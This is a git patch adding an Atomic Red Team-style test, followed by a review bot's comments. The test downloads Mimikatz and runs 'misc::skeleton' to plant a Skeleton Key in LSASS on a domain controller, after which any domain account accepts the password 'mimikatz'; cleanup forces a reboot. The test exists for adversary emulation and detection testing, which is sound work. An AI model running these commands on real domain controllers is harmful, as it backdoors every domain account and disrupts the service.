From 16ddc503401639ed9337e6799f421e658e8ca03e Mon Sep 17 00:00:00 2001
From: Dan Rogers <147435983+sp0r1um@users.noreply.github.com>
Date: Wed, 15 Apr 2026 21:08:04 -0600
Subject: [PATCH] Create new test - T1556.001 (#3310)
Co-authored-by: Hare Sudhan <27735081+cyberbuff@users.noreply.github.com>
---
 atomics/T1556.001/T1556.001.yaml | 46 ++++++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 atomics/T1556.001/T1556.001.yaml
diff --git a/atomics/T1556.001/T1556.001.yaml b/atomics/T1556.001/T1556.001.yaml
new file mode 100644
index 00000000..7d4ea86b
--- /dev/null
+++ b/atomics/T1556.001/T1556.001.yaml
@@ -0,0 +1,46 @@
+attack_technique: T1556.001
+display_name: 'Modify Authentication Process: Domain Controller Authentication'
+atomic_tests:
+- name: Skeleton Key via Mimikatz
+ description: |
+ Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+ user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+ This test must be run on an isolated domain controller and must not be performed on a production DC.
+ Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mimikatz_path:
+ type: path
+ default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+ description: Path to the mimikatz executable
+ file_path:
+ type: path
+ default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+ description: File path where the zipped mimikatz file is downloaded to
+ mimikatz_url:
+ type: url
+ default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+ description: The URL for the mimikatz release zip
+ directory_path:
+ type: path
+ default: C:\ExternalPayloads\Mimikatz
+ description: Directory path for mimikatz
+ dependency_executor_name: powershell
+ dependencies:
+ - description: Mimikatz must be present on the host machine at #{mimikatz_path}
+ prereq_command: |
+ if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+ Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+ Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+ executor:
+ command: |
+ & "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+ cleanup_command: |
+ Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+ Restart-Computer -Force
+ name: powershell
+ elevation_required: true
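Review bot: The dependency entry `- description: Mimikatz must be present on the host machine at #{mimikatz_path}` is a plain YAML scalar, and a ` #` inside a plain scalar begins a comment, so the parsed description stops at "at" and the argument placeholder is silently dropped; quoting the value, `- description: "Mimikatz must be present on the host machine at #{mimikatz_path}"`, keeps it intact (the `|` block scalars in prereq_command and get_prereq_command are not affected). The get_prereq_command downloads an unpinned "latest" release and extracts it with no integrity check, so what ends up under #{directory_path} depends on whatever the URL serves at run time; pinning mimikatz_url to a specific release and verifying a recorded hash with Get-FileHash before Expand-Archive would make the test reproducible. The description says the test must only run on an isolated domain controller, but nothing in prereq_command enforces that — checking the host's domain role there (and exiting 1 when it is not a DC) would turn the prose warning into an actual gate. The cleanup's `Restart-Computer -Force` reboots the host with no confirmation, which the description does state, so it is worth keeping that sentence in sync if the cleanup ever changes.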